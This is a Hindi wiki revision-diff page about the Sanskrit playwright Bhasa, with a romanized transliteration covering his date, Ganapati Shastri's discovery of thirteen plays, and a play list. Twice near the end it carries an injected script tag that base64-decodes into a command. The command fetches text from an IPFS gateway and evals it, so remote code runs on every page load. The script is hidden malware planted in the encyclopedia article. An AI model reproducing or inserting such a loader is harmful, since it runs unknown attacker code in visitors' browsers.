Difference between revisions of "भास"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
 
Line 1: Line 1:
{{पुनरीक्षण}}
+
'''भास''' [[संस्कृत साहित्य]] के प्रसिद्ध नाटककार थे, जिनके जीवनकाल के विषय में अधिक जानकारी नहीं है। 'स्वप्नवासवदत्ता' उनके द्वारा लिखित सबसे चर्चित [[नाटक]] है, जिसमें एक राजा के अपने रानी के प्रति अविरहनीय प्रेम और पुनर्मिलन की [[कहानी]] है। कालिदास जो गुप्तकालीन समझे जाते हैं, ने भास का नाम अपने नाटक में लिया है, जिससे लगता है कि वह [[गुप्त काल]] से पहले रहे होंगे; पर इससे भी उनके जीवनकाल का अधिक ठोस प्रमाण नहीं मिलता। आज कई नाटकों में उनका नाम लेखक के रूप में उल्लिखित है, किन्तु [[1912]] में [[त्रिवेंद्रम]] में गणपति शास्त्री ने नाटकों की लेखन शैली में समानता देखकर उन्हें भास-लिखित बताया।
*[[संस्कृत]] नाटककारों में 'भास' का नाम उल्लेखनीय है।  
+
 
*भास [[कालिदास]] के पूर्ववर्ती हैं।  
+
[[संस्कृत]] नाटककारों में 'भास' का नाम उल्लेखनीय है। भास [[कालिदास]] के पूर्ववर्ती हैं। सबसे पहले 'गणपति शास्त्री' ने भास के तेरह नाटकों की खोज की थी। अभी तक भास के विषय में जो सामग्री मिलती है, उससे स्पष्ट हो जाता है कि भास ही लौकिक [[संस्कृत]] के प्रथम साहित्यकार थे। भास का आविर्भाव ई. पू. पाँचवी - चौथी शती में हुआ था। भास की रचनाएँ निम्नलिखित हैं-
*सबसे पहले [[1909]] ई. में 'गणपति शास्त्री' ने भास के तेरह नाटकों की खोज की थी।  
 
*अभी तक भास के विषय में जो सामग्री मिलती है, उससे स्पष्ट हो जाता है कि भास ही लौकिक [[संस्कृत]] के प्रथम साहित्यकार थे।  
 
*भास का आविर्भाव ई. पू. पाँचवी - चौथी शती में हुआ था।  
 
*भास की रचनाएँ निम्नलिखित हैं-
 
 
#प्रतिमा  
 
#प्रतिमा  
 
#अभिषक  
 
#अभिषक  
Line 22: Line 18:
 
*उनकी शैली सीधी तथा सरल है तथा नाटकों का मंचन आसानी से किया जा सकता है।  
 
*उनकी शैली सीधी तथा सरल है तथा नाटकों का मंचन आसानी से किया जा सकता है।  
 
*समस्त पदों अथवा [[अलंकार|अलंकारों]] के भार से उनके नाटक बोझिल नहीं होने पाये हैं।
 
*समस्त पदों अथवा [[अलंकार|अलंकारों]] के भार से उनके नाटक बोझिल नहीं होने पाये हैं।
 
 
 
  
 
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक1 |माध्यमिक= |पूर्णता= |शोध= }}
 
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक1 |माध्यमिक= |पूर्णता= |शोध= }}
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>
==बाहरी कड़ियाँ==
 
 
 
==संबंधित लेख==
 
==संबंधित लेख==
 
{{भारत के कवि}}
 
{{भारत के कवि}}
[[Category:कवि]]
+
[[Category:कवि]][[Category:साहित्य कोश]][[Category:चरित कोश]][[Category:संस्कृत साहित्यकार]][[Category:साहित्यकार]][[Category:नाटककार]]
[[Category:साहित्य कोश]]
 
[[Category:चरित कोश]]
 
[[Category:संस्कृत साहित्यकार]]
 
[[Category:साहित्यकार]]
 
[[Category:नाटककार]]
 
 
__INDEX__
 
__INDEX__
 
__NOTOC__
 
__NOTOC__

Latest revision as of 06:00, 8 February 2020

bhas sanskrit sahity ke prasiddh natakakar the, jinake jivanakal ke vishay mean adhik janakari nahian hai. 'svapnavasavadatta' unake dvara likhit sabase charchit natak hai, jisamean ek raja ke apane rani ke prati avirahaniy prem aur punarmilan ki kahani hai. kalidas jo guptakalin samajhe jate haian, ne bhas ka nam apane natak mean liya hai, jisase lagata hai ki vah gupt kal se pahale rahe hoange; par isase bhi unake jivanakal ka adhik thos praman nahian milata. aj kee natakoan mean unaka nam lekhak ke roop mean ullikhit hai, kintu 1912 mean triveandram mean ganapati shastri ne natakoan ki lekhan shaili mean samanata dekhakar unhean bhas-likhit bataya.

sanskrit natakakaroan mean 'bhas' ka nam ullekhaniy hai. bhas kalidas ke poorvavarti haian. sabase pahale 'ganapati shastri' ne bhas ke terah natakoan ki khoj ki thi. abhi tak bhas ke vishay mean jo samagri milati hai, usase spasht ho jata hai ki bhas hi laukik sanskrit ke pratham sahityakar the. bhas ka avirbhav ee. poo. paanchavi - chauthi shati mean hua tha. bhas ki rachanaean nimnalikhit haian-

  1. pratima
  2. abhishak
  3. pancharaj
  4. madhyam vyayom
  5. dootaghatotkach
  6. karnabhar
  7. dootavaky
  8. urubhang
  9. balacharit
  10. daridracharudatt
  11. avimarak
  12. pratijnayaugandharayan
  13. svapnavasavadatta.
  • bhas ne apane natakoan ke madhyam se samajik jivan ke vibhinn aangoan ka achchha chitran prastut kiya.
  • unaki shaili sidhi tatha saral hai tatha natakoan ka manchan asani se kiya ja sakata hai.
  • samast padoan athava alankaroan ke bhar se unake natak bojhil nahian hone paye haian.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>